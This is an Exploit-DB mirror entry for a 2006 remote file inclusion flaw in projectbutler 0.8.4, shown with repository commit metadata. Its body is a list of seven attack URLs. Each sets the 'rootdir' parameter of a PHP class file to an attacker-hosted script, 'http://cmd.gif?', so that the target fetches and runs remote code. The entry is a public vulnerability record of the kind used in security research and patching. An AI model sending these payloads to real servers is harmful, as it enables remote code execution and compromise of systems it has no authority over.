exploit-db-mirror/exploits/php/webapps/2183.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

20 lines
No EOL
980 B
Text

########################################################################
# projectbutler-0.8.4 Remote File Inclusion Vulnerability
#
# Download: http://prdownloads.sourceforge.net/projectbutler/projectbutler-0.8.4.tar.gz?download
#
# Found By: the master
#
########################################################################
# exploit:
#
# http://[Target]/[Path]/classes/Cache.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/Customer.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/Performance.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/Project.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/Representative.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/User.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/common.php?rootdir=http://cmd.gif?
########################################################################
# milw0rm.com [2006-08-14]